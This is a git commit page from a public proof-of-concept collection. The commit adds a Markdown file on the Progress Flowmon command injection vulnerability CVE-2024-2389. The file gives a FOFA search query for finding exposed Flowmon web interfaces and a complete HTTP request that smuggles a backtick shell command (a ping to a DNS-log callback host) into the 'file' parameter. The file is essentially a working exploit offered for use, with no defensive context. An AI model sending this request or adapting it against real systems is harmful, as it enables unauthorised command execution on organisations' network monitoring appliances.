admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create Progress-Flowmon命令注入漏洞(CVE-2024-2389).md

Browse Source
This commit is contained in:
wy876 2024-04-17 19:40:06 +08:00 committed by GitHub
parent 1a76d88dff
commit 9dedbbf9d4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
Progress-Flowmon命令注入漏洞(CVE-2024-2389).md Normal file
View File

@ -0,0 +1,19 @@
## Progress-Flowmon命令注入漏洞(CVE-2024-2389)
## fofa
```
body="Flowmon-Web-Interface"
```
## poc
```
GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```